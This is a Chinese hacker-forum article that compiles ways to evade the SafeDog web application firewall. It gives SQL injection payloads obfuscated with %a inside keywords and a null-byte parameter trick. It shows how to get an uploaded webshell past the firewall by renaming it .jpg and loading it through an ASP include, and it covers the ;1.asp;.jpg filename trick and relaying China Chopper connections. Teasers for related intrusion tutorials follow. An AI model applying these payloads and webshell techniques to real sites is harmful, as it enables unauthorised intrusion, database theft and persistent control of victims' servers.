过安全狗技术总汇全集!!

hacker4年前黑客文章624
1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。
现在一点一点讲:
1.过注入
*** 一:a.asp?aaa=%00&id=sql语句
*** 二: a.asp?id=sql语句   里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin
2.过大马被阻拦访问
*** 一:上传一个大马 然后访问http://sss.com/dama.asp  访问后出现拦截。
那么解决 *** 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。
3.过菜刀连接一句话被拦截
*** 一:不用菜刀连接一句话,用别的一句话连接端。
*** 二:中转下连接菜刀,把过滤掉的词替换掉。
4.过1.asp;.jpg这样的文件拦截
*** 一:;1.asp;.jpg
*** 二:保密
具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!
下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀

这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

标签: 黑客技术

相关文章

我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

大家第六课讲了,怎样把内部网的的一台设备的端口转发出去,而且明确提出一个难题,假如内部网的一台设备上不了网,可否把它的端口转发出去?回答是能的,用EarthWorm或端口转发专用工具lcx都能够保证...

NipperStudio在互联网审批期内处理设备的本机配置

NipperStudio在互联网审批期内处理设备的本机配置

什么叫Nipper? Nipper Studio在互联网审批期内处理设备的本机配置,并使客户可以建立各种各样审查报告。应用传统式的方式 开展互联网审批,比如根据代理商的手机软件和互联网扫描枪或手动式...

入侵指定网站 常用的几种方法

首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 如果是静态的...

什么是免疫程序调试?免疫系统疾病CANVASpentes

什么是免疫程序调试?免疫系统疾病CANVASpentes

immunity debugger 翻译中文也可了解为“免疫力程序调试”;   什么是免疫程序调试? 免疫系统疾病CANVAS pentesting专用工具能够用于检测你的系统软件真的是多...

绕过安全狗用户限制提权

绕过安全狗用户限制提权

简要描述: 你还在为有安全狗而不能添加用户而烦恼么?那快来看~只需三步,在最新服务器安全狗4.0.05221账号保护全开的状态下,我是如何用guest获取登陆权限的.前提是要有提权exp哦...

帝国cms后台拿shell两种方法

第一种方法:  增加自定义页面 (6.0上实验成功) 模板管理–>增加自定义页面–>页面名称随便–>文件名:x.asp;.html–>页面内容–>小马...